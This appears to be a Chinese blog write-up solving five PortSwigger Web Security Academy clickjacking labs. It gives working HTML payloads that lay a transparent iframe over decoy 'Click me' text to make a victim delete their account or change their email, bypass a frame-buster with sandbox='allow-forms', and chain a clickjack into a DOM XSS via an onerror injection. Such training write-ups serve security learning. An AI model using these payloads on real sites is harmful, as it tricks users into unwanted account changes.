当前位置: 首页 > news >正文

Burpsuite实验室之点击劫持

Burpsuite实验室之点击劫持

这是BurpSuit官方的实验室靶场,以下将记录个人点击劫持共5个Lab的通关过程

lab1:

Basic clickjacking with CSRF token protection

带CSRF令牌保护的基本点击劫持

目标:官方给了一个账号密码wiener:peter,让我们登陆到后台,后台有删除功能。我们构造payload页面并显示click me一词让受害者进行点击。

在这里插入图片描述

后台的删除功能,我们要做的就是构造诱导用户点击这个删除按钮,该页面地址为(payload需要用到)

https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account

在这里插入图片描述

我们的payload利用了iframe标签,以下是body中的内容,其中的width、height、top、left需要自行调节对准即可,opacity透明度设为0.1方便调整,在真实情况设为0将它隐藏,用户不会知道自己点了什么

<style>
		   iframe {
		        position:relative;
		        width: 500px;
		        height: 700px;
		        opacity: 0.1;
		        z-index: 2;
		    }
		    div {
		        position:absolute;
		        top:500px;
		        left:60px;
		        z-index: 1;
		    }
</style>
		<div>Test me</div>
		<iframe src="https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account"></iframe>

在exploit server页面添加我们的payload看看效果

在这里插入图片描述

效果如下,点击Test me真就删了千万不要点

在这里插入图片描述

效果不错,我们最终更改payload的透明度并把Test me改为Click me

<style>
		   iframe {
		        position:relative;
		        width: 500px;
		        height: 700px;
		        opacity: 0;
		        z-index: 2;
		    }
		    div {
		        position:absolute;
		        top:500px;
		        left:60px;
		        z-index: 1;
		    }
</style>
		<div>Click me</div>
		<iframe src="https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account"></iframe>

这次啥也看不见了,受害者会好奇的点击我们的Click me,此时其实完成了删除用户的操作

在这里插入图片描述

验证结果,点击Deliver exploit to victim成功通关

在这里插入图片描述

lab2:

Clickjacking with form input data prefilled from a URL parameter

使用从URL参数预填充的表单输入数据单击劫持

这次目标变了,让我们更改用户的邮箱

在这里插入图片描述

定准位和lab1一样,找到update email接口的url更改iframe的src即可,最终payload如下

<style>
			iframe {
				position: relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}

			div {
				position: absolute;
				top: 450px;
				left: 80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
			src="https://0a5d00cc033dfde8c0712b5e00060032.web-security-academy.net/my-account?email=tpaer@hack.com"></iframe>

lab3:

Clickjacking with a frame buster script

用框架克星脚本点击劫持

这关表明看起来和lab2是一样的,也是邮箱

在这里插入图片描述

但是用和lab2一样的payload发现这个站点并不能被iframe框架化。因为可以框架化的站点都可能会遭受点击劫持攻击,开发时可能会做出一些防护设置如

检查并强制将当前应用程序窗口设置为主窗口或顶级窗口

让所有框架不透明化

阻止点击透明的框架

拦截并标记潜在的点击劫持攻击位置

这种技术防护是基于浏览器和平台的,有的浏览器会阻止运行破坏框架脚本或不支持运行JS脚本,攻击时有很多方法可以绕过。

在这里插入图片描述

通过iframe沙箱属性sanbox="allow-forms"进行绕过,最终payload如下

<style>
			iframe {
				position: relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}

			div {
				position: absolute;
				top: 445px;
				left: 80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
			src="https://0ab000ca03c23aa4c00f023f005d00cd.web-security-academy.net/my-account?email=tpaer@hack.com" sandbox="allow-forms"></iframe>

在这里插入图片描述

lab4:

Exploiting clickjacking vulnerability to trigger DOM-based XSS

利用点击劫持漏洞触发基于DOM的XSS

这关是DOM XSS与iframe结合进行攻击。

一个提交页面

在这里插入图片描述

寻找可用的DOM,源码发现引入了一个js文件

在这里插入图片描述

查看源码发现存在DOM XSS的部分
在这里插入图片描述

通过iframe成功帮助实现DOM XSS攻击

在这里插入图片描述

最终payload如下

<style>
			iframe {
				position:relative;
				width: 700px;
				height: 500px;
				opacity: 0;
				z-index: 2;
			}
			div {
				position:absolute;
				top:415px;
				left:80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
		src="https://0a1e00db03d7474cc0aa2590001200a3.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=tpa@hack.com&subject=test&message=test#feedbackResult"></iframe>

lab5:

Multistep clickjacking

多步点击劫持

这一关要诱导用户点击多个按钮

在这里插入图片描述

在点击完删除按钮后,会跳转页面需要进行确认

在这里插入图片描述

效果如下,第一个按钮

在这里插入图片描述

第二个按钮

在这里插入图片描述

最终payload

<style>
			iframe {
				position:relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}
		   .firstClick, .secondClick {
				position:absolute;
				top:495px;
				left:40px;
				z-index: 1;
			}
		   .secondClick {
				top:290px;
				left:210px;
			}
		</style>
		<div class="firstClick">Click me first</div>
		<div class="secondClick">Click me next</div>
		<iframe src="https://0a4d002d03b4a808c055056300d200b8.web-security-academy.net/my-account"></iframe>

相关文章:

  • 配置静态ip,主机名,centos安装jdk,hadoop等
  • 目标检测论文解读复现之十:基于YOLOv5的遥感图像目标检测
  • 如何在Java中计算Levenshtein莱文斯坦(相似度)编辑距离 ?
  • 【Python性能优化实例】计算 numpy 数组首尾为 0 的数量
  • C语言百日刷题第九天
  • 「避坑宝典」为大家分享笔者在22 年所遇到“匪夷所思”的 Bug 趣事
  • 什么是JUC
  • 图解LeetCode——775. 全局倒置与局部倒置(难度:中等)
  • apache 组件下载地址
  • 【JavaSE】继承那些事儿
  • 【数据结构】栈基本操作的实现(C语言)
  • MySQL纯代码复习
  • akshare复权算法-港股复权后数据代码分享
  • 通俗易懂话GC-C#的内存管理
  • 使用小程序制作一个电子木鱼,功德+1
  • Android Studio App开发之实现底部标签栏BottomNavigationView和自定义标签按钮实战(附源码 超详细必看)
  • Vue/Vuex (actions) 核心概念 使用方法、辅助函数 mapActions使用方法说明
  • Flink学习:Flink支持的数据类型
  • 【论文复现】——FEC: Fast Euclidean Clustering for Point Cloud Segmentation
  • 第十三届蓝桥杯C++B组省赛 I 题——李白打酒加强版 (AC)
  • 李在明回应韩国大法院判决:与自己所想截然不同,将顺从民意
  • 体坛联播|欧冠巴萨3比3战平国米,柯洁未进入国家集训队
  • 人民日报社论:坚定信心、奋发有为、创新创造——写在“五一”国际劳动节
  • 荣盛发展股东所持1.17亿股将被司法拍卖,起拍价约1.788亿元
  • 人物|德国新外长关键词:总理忠实盟友、外交防务专家、大西洋主义者
  • 中国武术协会原主席张耀庭逝世,曾促成电影《少林寺》拍摄